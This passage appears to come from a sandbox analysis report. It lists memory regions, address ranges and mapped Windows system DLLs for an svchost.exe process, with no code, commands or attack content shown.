0x7a1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1766 start_va = 0x8430000 end_va = 0x852ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008430000" filename = "" Region: id = 1767 start_va = 0x8d30000 end_va = 0x8e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d30000" filename = "" Region: id = 1768 start_va = 0x8e30000 end_va = 0x8f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e30000" filename = "" Region: id = 1769 start_va = 0x8f30000 end_va = 0x902ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f30000" filename = "" Region: id = 1770 start_va = 0x9030000 end_va = 0x912ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009030000" filename = "" Region: id = 1771 start_va = 0x9130000 end_va = 0x922ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 1772 start_va = 0x9230000 end_va = 0x932ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009230000" filename = "" Region: id = 1773 start_va = 0x9330000 end_va = 0x942ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009330000" filename = "" Region: id = 1774 start_va = 0x9430000 end_va = 0x952ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009430000" filename = "" Region: id = 1775 start_va = 0x9530000 end_va = 0x962ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009530000" filename = "" Region: id = 1776 start_va = 0x9630000 end_va = 0x972ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009630000" filename = "" Region: id = 1777 start_va = 0x9730000 end_va = 0x982ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009730000" filename = "" Region: id = 1778 start_va = 0x9830000 end_va = 0x992ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009830000" filename = "" Region: id = 1779 start_va = 0x9930000 end_va = 0x9a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009930000" filename = "" Region: id = 1780 start_va = 0x9a30000 end_va = 0xaa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a30000" filename = "" Region: id = 1781 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1782 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1783 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1784 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1785 start_va = 0x7ff60e670000 end_va = 0x7ff60e67cfff monitored = 0 entry_point = 0x7ff60e673980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1786 start_va = 0x7ffc433b0000 end_va = 0x7ffc433e1fff monitored = 0 entry_point = 0x7ffc433bb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1787 start_va = 0x7ffc43600000 end_va = 0x7ffc438affff monitored = 0 entry_point = 0x7ffc43601cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1788 start_va = 0x7ffc439d0000 end_va = 0x7ffc43a13fff monitored = 0 entry_point = 0x7ffc439f83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1789 start_va = 0x7ffc43a20000 end_va = 0x7ffc43a7cfff monitored = 0 entry_point = 0x7ffc43a4e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1790 start_va = 0x7ffc43ba0000 end_va = 0x7ffc43bdefff monitored = 0 entry_point = 0x7ffc43bc82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1791 start_va = 0x7ffc43c90000 end_va = 0x7ffc43ca6fff monitored = 0 entry_point = 0x7ffc43c97520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1792 start_va = 0x7ffc449a0000 end_va = 0x7ffc44aaefff monitored = 0 entry_point = 0x7ffc449dc010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1793 start_va = 0x7ffc45de0000 end_va = 0x7ffc45df7fff monitored = 0 entry_point = 0x7ffc45de1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1794 start_va = 0x7ffc45e50000 end_va = 0x7ffc45e60fff monitored = 0 entry_point = 0x7ffc45e528d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1795 start_va = 0x7ffc45e70000 end_va = 0x7ffc45e8cfff monitored = 0 entry_point = 0x7ffc45e74f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1796 start_va = 0x7ffc45fe0000 end_va = 0x7ffc46025fff monitored = 0 entry_point = 0x7ffc45fe79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1797 start_va = 0x7ffc46080000 end_va = 0x7ffc460e6fff monitored = 0 entry_point = 0x7ffc4608b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1798 start_va = 0x7ffc46130000 end_va = 0x7ffc4624cfff monitored = 0 entry_point = 0x7ffc4615fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1799 start_va = 0x7ffc47170000 end_va = 0x7ffc47183fff monitored = 0 entry_point = 0x7ffc47172a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1800 start_va = 0x7ffc4a570000 end_va = 0x7ffc4a577fff monitored = 0 entry_point = 0x7ffc4a5713b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1801 start_va = 0x7ffc4a580000 end_va = 0x7ffc4a597fff monitored = 0 entry_point = 0x7ffc4a58b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1802 start_va = 0x7ffc4bc90000 end_va = 0x7ffc4bcc5fff monitored = 0 entry_point = 0x7ffc4bc927f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1803 start_va = 0x7ffc4bd50000 end_va = 0x7ffc4bd63fff monitored = 0 entry_point = 0x7ffc4bd53710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1804 start_va = 0x7ffc4bd70000 end_va = 0x7ffc4bd97fff monitored = 0 entry_point = 0x7ffc4bd7efc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1805 start_va = 0x7ffc4be00000 end_va = 0x7ffc4be1dfff monitored = 0 entry_point = 0x7ffc4be0ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1806 start_va = 0x7ffc4be20000 end_va = 0x7ffc4be35fff monitored = 0 entry_point = 0x7ffc4be21af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1807 start_va = 0x7ffc4be40000 end_va = 0x7ffc4be59fff monitored = 0 entry_point = 0x7ffc4be42330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1808 start_va = 0x7ffc4be60000 end_va = 0x7ffc4be6cfff monitored = 0 entry_point = 0x7ffc4be61420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1809 start_va = 0x7ffc4c110000 end_va = 0x7ffc4c121fff monitored = 0 entry_point = 0x7ffc4c111a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1810 start_va = 0x7ffc4c140000 end_va = 0x7ffc4c1c3fff monitored = 0 entry_point = 0x7ffc4c158d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1811 start_va = 0x7ffc4c1d0000 end_va = 0x7ffc4c1e5fff monitored = 0 entry_point = 0x7ffc4c1d55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1812 start_va = 0x7ffc4c1f0000 end_va = 0x7ffc4c2c5fff monitored = 0 entry_point = 0x7ffc4c21a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1813 start_va = 0x7ffc4c2d0000 end_va = 0x7ffc4c333fff monitored = 0 entry_point = 0x7ffc4c2ebed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1814 start_va = 0x7ffc4c340000 end_va = 0x7ffc4c364fff monitored = 0 entry_point = 0x7ffc4c349900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1815 start_va = 0x7ffc4c370000 end_va = 0x7ffc4c383fff monitored = 0 entry_point = 0x7ffc4c371800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1816 start_va = 0x7ffc4c390000 end_va = 0x7ffc4c485fff monitored = 0 entry_point = 0x7ffc4c3c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1817 start_va = 0x7ffc4c490000 end_va = 0x7ffc4c503fff monitored = 0 entry_point = 0x7ffc4c4a5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1818 start_va = 0x7ffc4c510000 end_va = 0x7ffc4c646fff monitored = 0 entry_point = 0x7ffc4c550480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1819 start_va = 0x7ffc4c650000 end_va = 0x7ffc4c65efff monitored = 0 entry_point = 0x7ffc4c654960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1820 start_va = 0x7ffc4c680000 end_va = 0x7ffc4c8f9fff monitored = 0 entry_point = 0x7ffc4c69a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1821 start_va = 0x7ffc4c9c0000 end_va = 0x7ffc4c9cffff monitored = 0 entry_point = 0x7ffc4c9c1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1822 start_va = 0x7ffc4ca10000 end_va = 0x7ffc4ca22fff monitored = 0 entry_point = 0x7ffc4ca11b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1823 start_va = 0x7ffc4ca30000 end_va = 0x7ffc4cab1fff monitored = 0 entry_point = 0x7ffc4ca31790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 1824 start_va = 0x7ffc4cac0000 end_va = 0x7ffc4cb43fff monitored = 0 entry_point = 0x7ffc4cad2830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1825 start_va = 0x7ffc4cb50000 end_va = 0x7ffc4cbb4fff monitored = 0 entry_point = 0x7ffc4cb63170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 1826 start_va = 0x7ffc4cc10000 end_va = 0x7ffc4cc20fff monitored = 0 entry_point = 0x7ffc4cc17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1827 start_va = 0x7ffc4ccb0000 end_va = 0x7ffc4cee5fff monitored = 0 entry_point = 0x7ffc4cd3a450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1828 start_va = 0x7ffc4dbb0000 end_va = 0x7ffc4dbc0fff monitored = 0 entry_point = 0x7ffc4dbb2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1829 start_va = 0x7ffc4dbd0000 end_va = 0x7ffc4dbedfff monitored = 0 entry_point = 0x7ffc4dbd3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1830 start_va = 0x7ffc4dbf0000 end_va = 0x7ffc4dc71fff monitored = 0 entry_point = 0x7ffc4dbf2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1831 start_va = 0x7ffc4dcd0000 end_va = 0x7ffc4dd0ffff monitored = 0 entry_point = 0x7ffc4dcdcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1832 start_va = 0x7ffc4dd10000 end_va = 0x7ffc4dd56fff monitored = 0 entry_point = 0x7ffc4dd11d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1833 start_va = 0x7ffc4dd60000 end_va = 0x7ffc4dda1fff monitored = 0 entry_point = 0x7ffc4dd63670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1834 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4ddf1fff monitored = 0 entry_point = 0x7ffc4dde2540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1835 start_va = 0x7ffc4de00000 end_va = 0x7ffc4ded4fff monitored = 0 entry_point = 0x7ffc4de1cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1836 start_va = 0x7ffc4dfc0000 end_va = 0x7ffc4dffffff monitored = 0 entry_point = 0x7ffc4dfd6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1837 start_va = 0x7ffc4e070000 end_va = 0x7ffc4e08efff monitored = 0 entry_point = 0x7ffc4e0737e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1838 start_va = 0x7ffc4e090000 end_va = 0x7ffc4e108fff monitored = 0 entry_point = 0x7ffc4e0976a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1839 start_va = 0x7ffc4e2f0000 end_va = 0x7ffc4e305fff monitored = 0 entry_point = 0x7ffc4e2f1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1840 start_va = 0x7ffc4e310000 end_va = 0x7ffc4e327fff monitored = 0 entry_point = 0x7ffc4e314e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1841 start_va = 0x7ffc4e330000 end_va = 0x7ffc4e354fff monitored = 0 entry_point = 0x7ffc4e335ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1842 start_va = 0x7ffc4e3c0000 end_va = 0x7ffc4e400fff monitored = 0 entry_point = 0x7ffc4e3c3750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1843 start_va = 0x7ffc4e410000 end_va = 0x7ffc4e502fff monitored = 0 entry_point = 0x7ffc4e435d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1844 start_va = 0x7ffc4e510000 end_va = 0x7ffc4e527fff monitored = 0 entry_point = 0x7ffc4e512000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1845 start_va = 0x7ffc4e530000 end_va = 0x7ffc4e6b1fff monitored = 0 entry_point = 0x7ffc4e5482a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1846 start_va = 0x7ffc4e890000 end_va = 0x7ffc4eb88fff monitored = 0 entry_point = 0x7ffc4e957280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1847 start_va = 0x7ffc4eca0000 end_va = 0x7ffc4ed42fff monitored = 0 entry_point = 0x7ffc4eca2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1848 start_va = 0x7ffc4ed50000 end_va = 0x7ffc4eda1fff monitored = 0 entry_point = 0x7ffc4ed55770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1849 start_va = 0x7ffc4edb0000 end_va = 0x7ffc4edddfff monitored = 1 entry_point = 0x7ffc4edb2300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1850 start_va = 0x7ffc4ede0000 end_va = 0x7ffc4ee3dfff monitored = 0 entry_point = 0x7ffc4ede5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1851 start_va = 0x7ffc4ee40000 end_va = 0x7ffc4ee5ffff monitored = 0 entry_point = 0x7ffc4ee41f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1852 start_va = 0x7ffc4ee60000 end_va = 0x7ffc4ee68fff monitored = 0 entry_point = 0x7ffc4ee618f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1853 start_va = 0x7ffc4ee70000 end_va = 0x7ffc4ee80fff monitored = 0 entry_point = 0x7ffc4ee71d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1854 start_va = 0x7ffc4ee90000 end_va = 0x7ffc4ef0efff monitored = 0 entry_point = 0x7ffc4eea7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1855 start_va = 0x7ffc4ef10000 end_va = 0x7ffc4ef4bfff monitored = 0 entry_point = 0x7ffc4ef16aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1856 start_va = 0x7ffc4f0d0000 end_va = 0x7ffc4f11bfff monitored = 0 entry_point = 0x7ffc4f0e5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1857 start_va = 0x7ffc4f220000 end_va = 0x7ffc4f22bfff monitored = 0 entry_point = 0x7ffc4f2235c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1858 start_va = 0x7ffc505f0000 end_va = 0x7ffc505f8fff monitored = 0 entry_point = 0x7ffc505f21d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1859 start_va = 0x7ffc50660000 end_va = 0x7ffc50694fff monitored = 0 entry_point = 0x7ffc5066a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1860 start_va = 0x7ffc50a50000 end_va = 0x7ffc50d89fff monitored = 0 entry_point = 0x7ffc50a58520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1861 start_va = 0x7ffc51300000 end_va = 0x7ffc51309fff monitored = 0 entry_point = 0x7ffc51301350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1862 start_va = 0x7ffc516a0000 end_va = 0x7ffc516b1fff monitored = 0 entry_point = 0x7ffc516a3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1863 start_va = 0x7ffc538e0000 end_va = 0x7ffc538e9fff monitored = 0 entry_point = 0x7ffc538e14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1864 start_va = 0x7ffc53d70000 end_va = 0x7ffc53d7ffff monitored = 0 entry_point = 0x7ffc53d71700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1865 start_va = 0x7ffc53d80000 end_va = 0x7ffc53d88fff monitored = 0 entry_point = 0x7ffc53d81ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1866 start_va = 0x7ffc53d90000 end_va = 0x7ffc53dbcfff monitored = 0 entry_point = 0x7ffc53d92290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1867 start_va = 0x7ffc53dc0000 end_va = 0x7ffc53e11fff monitored = 0 entry_point = 0x7ffc53dc38e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1868 start_va = 0x7ffc54080000 end_va = 0x7ffc540fffff monitored = 0 entry_point = 0x7ffc540ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1869 start_va = 0x7ffc54160000 end_va = 0x7ffc54174fff monitored = 0 entry_point = 0x7ffc54162dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1870 start_va = 0x7ffc541c0000 end_va = 0x7ffc541cdfff monitored = 0 entry_point = 0x7ffc541c1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1871 start_va = 0x7ffc541d0000 end_va = 0x7ffc541eafff monitored = 0 entry_point = 0x7ffc541d1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1872 start_va = 0x7ffc54510000 end_va = 0x7ffc545a9fff monitored = 0 entry_point = 0x7ffc5452ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1873 start_va = 0x7ffc54680000 end_va = 0x7ffc546e6fff monitored = 0 entry_point = 0x7ffc546863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1874 start_va = 0x7ffc54740000 end_va = 0x7ffc54754fff monitored = 0 entry_point = 0x7ffc54743460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1875 start_va = 0x7ffc54830000 end_va = 0x7ffc548effff monitored = 0 entry_point = 0x7ffc5485fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1876 start_va = 0x7ffc54b20000 end_va = 0x7ffc54b39fff monitored = 0 entry_point = 0x7ffc54b22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1877 start_va = 0x7ffc54b40000 end_va = 0x7ffc54b53fff monitored = 0 entry_point = 0x7ffc54b42d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1878 start_va = 0x7ffc54b60000 end_va = 0x7ffc54b6afff monitored = 0 entry_point = 0x7ffc54b61de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1879 start_va = 0x7ffc54ed0000 end_va = 0x7ffc54f62fff monitored = 0 entry_point = 0x7ffc54ed9680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1880 start_va = 0x7ffc55190000 end_va = 0x7ffc551a5fff monitored = 0 entry_point = 0x7ffc551919f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = 